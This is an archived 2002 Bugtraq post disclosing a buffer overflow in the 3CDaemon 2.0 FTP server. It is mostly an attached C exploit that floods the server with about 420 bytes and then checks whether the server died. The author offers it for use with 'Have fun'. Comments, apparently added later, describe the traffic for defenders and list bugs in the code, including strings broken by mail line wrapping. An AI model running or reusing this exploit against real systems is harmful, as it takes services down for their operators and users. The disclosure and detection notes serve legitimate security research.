
3CDaemon DoS exploit


Date: Tue, 30 Apr 2002 06:43:53 +0200
From: skyrim msh <skyrim@hotmail.com>
To: bugtraq@securityfocus.com
Subject: 3CDaemon DoS exploit

------=_NextPart_000_74ae_6d9d_23c8
Content-Type: text/plain; format=flowed

3CDaemon 2.0 revision 10 for the Windows platform contains a buffer overflow (BOF)
vulnerability that is reachable at any point in a session, including at the login
prompt. When 400+ chars are sent to the FTP server, it crashes immediately. A remote
exploit is included; see it for more details.

greets,
skyrim - skyrim@madskill.tk
MaD SKiLL 'H' - http://www.madskill.tk


------=_NextPart_000_74ae_6d9d_23c8
Content-Type: text/plain; name="msh3comdos.c"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="msh3comdos.c"

/* MaD SKiLL 'H'
* MsH 4 life! http://www.madskill.tk
* *Private Release*
*
* 3CDaemon 2.0 revision 10 DoS
*
* 11:12 14-4-2002: BOF flaw found by skyrim
*  1:00 15-4-2002: exploit done.
* 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
*
* This program exploits the buffer overflow vulnerability in
* 3CDaemon 2.0 FTP servers. Sending 400+ chars makes the server crash,
* no matter when during the session they are sent.
*
* Tested on:
* [OS]                                    [version]
*  Windows XP (5.1 - 2600)                 3CDaemon 2.0 revision 10
*
*  ###
* #####      ####                            ##
* ######    ######                         ######
* ######   ########   ########            ########      ######
* ######  ####### ### ###########          ########     #######
* ###### ######## #### ############        ########     #######
* ############### ##### ############        #######     #######
* ############## ######  ############       #######     #######
* ############## #######  ###########        ######    #######
* ############# ########  ### ########       ######  #########
*  ############ ### ####  ### #######        #################
*   ##### ###############  ##########        #################
*    ###  ######### #####  #########         ################
*    #### ######### ##### #########          ################
*     ### ######### #############            ################
*      ## #########  ######                  ######   #######
*          ### ####                          ######   #######
*                                            ######  ########
*                                            ######  ########
*    ####   ## ###### ###  ###        ###    ######  ########
*   ####### ########  ###  ####      #####    #####   #######
*   ###############   ###  ####      #####     #####  #######
*   ####### ########       ####      #####       ##     ###
*   ######  ######### #### ####      #####
*    #####   ######## #### ####       ####
*     ###### ######## #### ####   ### ####   ##
*      ########## ### #### #### ########## ######
*       ######### ### ###########################
*      ##########  ######## #####################
*    #############  ######  ########## ##########
*   ########  #####   ####  ###   ###  ###   ###
*
* I don't know if this will work on versions other than the one I tested it on.
* Have fun.
*
* Crew shouts go to: MsH, DFA, uDc
* Personal shouts to: mannie, primus, amok, torment, talented, warsteam, 
frodo, maxxo,
* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
*
* skyrim (skyrim@m4dskill.tk)
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define BOFSIZE 420

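/*
 * Print the tool's identification banner to stdout.
 *
 * The archived listing had this string literal split across two lines by
 * the mail client's line wrapping, which does not compile; it is rejoined
 * here. The function is declared to return char but originally returned
 * nothing, so a defined value (0) is returned now.
 */
char banner(void)
{
    printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10 DoS\n.:[MsH]:.\n   ---\n");
    return 0;
}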

/*
 * Fatal-error helper: hand msg to perror(), which prints it together with
 * the text for the current errno on stderr, then end the process with
 * exit status 1. Does not return to the caller.
 */
void E(char *msg)
{
    perror(msg);
    exit(1);
}

/*
 * Entry point of the proof-of-concept. Takes a hostname/IP (argv[1]) and a
 * port (argv[2]), opens a TCP connection, writes a buffer of 'A' bytes,
 * closes the connection, waits 5 seconds and tries to connect again to see
 * whether the service still accepts connections.
 *
 * Defender's reading of the traffic this code produces: right after the TCP
 * handshake the client sends one run of 0x41 bytes of roughly BOFSIZE (420)
 * length, with no FTP verb and no CRLF, without reading the server greeting
 * and without logging in. The file header states that 400+ characters crash
 * 3CDaemon 2.0 revision 10, so a length limit on FTP control-channel lines
 * in front of the service, and an alert on overlong unterminated input,
 * address the condition as described there.
 *
 * NOTE(review): the listing is damaged by mail line wrapping (several string
 * literals are split across lines) and relies on headers the file does not
 * include (exit, atoi, memset, strlen, bzero, bcopy, write, close, sleep).
 * The missing return type on main is implicit int, which is not valid since
 * C99.
 */
main(int argc, char *argv[])
{
    /* Payload buffer; static storage, so zero-initialised before the fill. */
    static char ownage[BOFSIZE];
    int sockfd, sockfd2, n;

    struct sockaddr_in server_addr;
    struct hostent *server;

/* Exactly two arguments are required: target host and port. */
if (argc != 3) {
    fprintf(stderr,"Usage: %s hostname/ip port\n", argv[0]);
    exit(1);
   }
    banner();
    /*
     * Every one of the BOFSIZE bytes is set to 'A', so the array holds no
     * NUL terminator.
     */
    memset(ownage, 'A', BOFSIZE);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) E("Error occured during opening socket");
    /*
     * NOTE(review): gethostbyname() reports failures through h_errno, not
     * errno, so the perror() text printed by E() may be unrelated.
     */
    server = gethostbyname(argv[1]);
    if (server == NULL) E("Error occured during host lookup -No such 
host?-\n");

    /* Build the IPv4 destination from the first resolved address. */
    bzero((char *) &server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr,
         (char *)&server_addr.sin_addr.s_addr,
         server->h_length);
    /* atoi() gives no error indication; the port argument is not validated. */
    server_addr.sin_port = htons(atoi(argv[2]));
    printf("Connecting to target FTP server... ");
    /*
     * NOTE(review): &server_addr is a struct sockaddr_in *, passed without
     * the cast to struct sockaddr * that connect() expects.
     */
    if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E("Error 
occured during connecting\n"); }
    printf("Connected, Probing BOF... \n");
    /*
     * NOTE(review): strlen() on the unterminated array reads past its end
     * (undefined behaviour), so the number of bytes written is not
     * guaranteed to be BOFSIZE. Detection should therefore key on an
     * overlong control-channel line rather than on an exact byte count.
     */
    n = write(sockfd,ownage,strlen(ownage));
    if (n < 0) { E("Error occured during writing to socket"); }
    close(sockfd);
    /* Second socket for the liveness check; its result is not checked. */
    sockfd2=socket(AF_INET, SOCK_STREAM, 0);
    printf("Done, checking if server is dead.. \n");
    sleep(5);
    /*
     * Any connect() failure here is reported as a crash, so a filtered port
     * or a transient network error produces the same message. sockfd2 is
     * never closed on either path.
     */
    if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) { 
printf("Couldn't establish connection: It seems like it died! =)\n"); 
exit(0); }
    printf("Server is still alive. Perhaps its not vulnerable?\n");
    return 0;
}

------=_NextPart_000_74ae_6d9d_23c8--
